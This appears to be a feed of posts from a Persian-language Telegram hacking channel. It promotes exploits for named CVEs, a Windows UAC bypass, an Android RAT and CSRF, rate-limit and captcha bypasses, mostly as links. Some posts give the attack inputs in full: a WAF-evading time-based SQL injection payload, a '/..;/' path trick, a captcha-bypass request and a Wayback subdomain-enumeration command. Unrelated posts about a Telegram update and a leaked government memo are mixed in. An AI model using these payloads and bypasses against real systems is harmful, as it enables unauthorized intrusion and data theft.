CVE-2022-40146 ( SSRF and RCE Through Remote Class Loading ) Exploit

Link

#Exploit #RCE #SSRF
——————
0Day.Today
@LearnExploit
@Tech_Army

CVE-2021-39144 ( VMware Cloud Foundation RCE vulnerability via XStream )

Github

#RCE
——————
0Day.Today
@LearnExploit
@Tech_Army

Not only crawling but you can do Subdomain Enumeration using Wayback.

curl --insecure --silent "http://web.archive.org/cdx/search/cdx…" | sed -e 's_https*://__' -e "s/\/.*//" -e 's/:.*//' -e 's/^www\.//' | sed "/@/d" | sed -e 's/\.$//' | sort -u

#bugbounty
——————
0Day.Today
@LearnExploit
@Tech_Army

UAC bypass for x64 Windows 7 - 11

Github

#bypass
——————
0Day.Today
@LearnExploit
@Tech_Army

0'XOR(if(now()=sysdate(),sleep(10),0))XOR'Z

We have added some adjustments to the payload that may bypass some WAFs & to help you with the hunt!

twitter

#BugBountyTips
——————
0Day.Today
@LearnExploit
@Tech_Army

Top 10 SSRF Dorks

#SSRF #Dork
——————
0Day.Today
@LearnExploit
@Tech_Army

آموزش رت اندرویدی Cypher

Rat

#android #rat
——————
0Day.Today
@LearnExploit
@Tech_Army

#android #rat
——————
0Day.Today
@LearnExploit
@Tech_Army

cve-2022-3602
cve-2022-3786 / openssl-poc

Github

#Openssl #poc
——————
0Day.Today
@LearnExploit
@Tech_Army

CVE-2022-33679 ( Harmful RC4 and 1day exploit )

Exploit

READ

#windows #exploit
——————
0Day.Today
@LearnExploit
@Tech_Army

#Quotes

V: Tellme, do you know what day it is, Evey?
Evey: November the 4th?
V: Not Anymore

——————
0Day.Today
@LearnExploit
@Tech_Army

Bypassing Rate Limit Protection

Github

#bypass #bugbounty
——————
0Day.Today
@LearnExploit
@Tech_Army

/..;/

#trick
——————
0Day.Today
@LearnExploit
@Tech_Army

بررسی CVE های پر سر و صدای این هفته (7 تا 13 آبان 1401)

https://vrgl.ir/oyat6


#CVE
——————
0Day.Today
@LearnExploit
@Tech_Army

🔶 آپدیت جدید تلگرام منتشر شد .

➕ موضوع در گروه‌ها

در گروه‌هایی که بیشتر از 200 عضو داشته باشند، می‌توانید بحث‌ها را به شکل موضوع‌های جداگانه ساماندهی کنید. این قابلیت را در @TheForum امتحان‌ کنید.

➕ نام‌های کاربری کلکسیونی

در پلتفرم جدید، با استفاده از بلاکچین، نام کاربری‌های اضافی را ذخیره کرده و از آن‌ها در پروفایل، گروه یا کانال خود استفاده کنید.

➕ تبدیل صدا به متن در پیام‌های ویدیویی

از این پس کاربران‌ پرمیوم می‌توانند پیام‌های ویدیویی را به متن‌ تبدیل کنند.

➕ واکنش‌ها و ایموجی‌های تعاملی بیشتر

از این پس زمانی که در گفتگوی‌های تک به تک روی ایموجی‌های 😴👨‍💻🤓👀 بزنید، انیمیشن‌های تمام‌صفحه را نمایش داده می‌شوند. چنانچه تلگرام طرف مقابل باز باشد، انیمیشن بطور همزمان برای او هم نمایش داده‌خواهد‌شد.
همچنین 😴👨‍💻🤓👀 و 👻🎃😭 هم به عنوان واکنش برای همه کاربران دردسترس خواهند بود.

➕ بسته‌های‌ اموجی جدید

کاربران پرمیوم به 12 بسته اموجی جدید که توسط هنرمندان تلگرام طراحی شده‌اند، دسترسی خواهند داشت.

Read more

#Telegram
——————
0Day.Today
@LearnExploit
@Tech_Army

You can now use ngrok without even installing ngrok

#ngrok
——————
0Day.Today
@LearnExploit
@Tech_Army

How to find XSS using URLs at scale via Nuclei

#Xss #trick
——————
0Day.Today
@LearnExploit
@Tech_Army

پیرو صورت‌جلسه محرمانه‌ی گروه اصلی طرح صیانت (از جمله وزیر فعلی دولت آقای دکتر رئیسی و وزیر دولت آقای دکتر احمدی‌نژاد)

OFFSEC
——————
0Day.Today
@LearnExploit
@Tech_Army

Bypassing CSRF Protection

Github

#bypass #Csrf
——————
0Day.Today
@LearnExploit
@Tech_Army

Bypass Captcha (Google reCAPTCHA)

1 . Try changing the request method, for example POST to GET
POST / HTTP 1.1
Host: http://target.com
...

_RequestVerificationToken=xxxxxxxxxxxxxx&_Username=daffa&_Password=test123

#bugbounty #bypass
——————
0Day.Today
@LearnExploit
@Tech_Army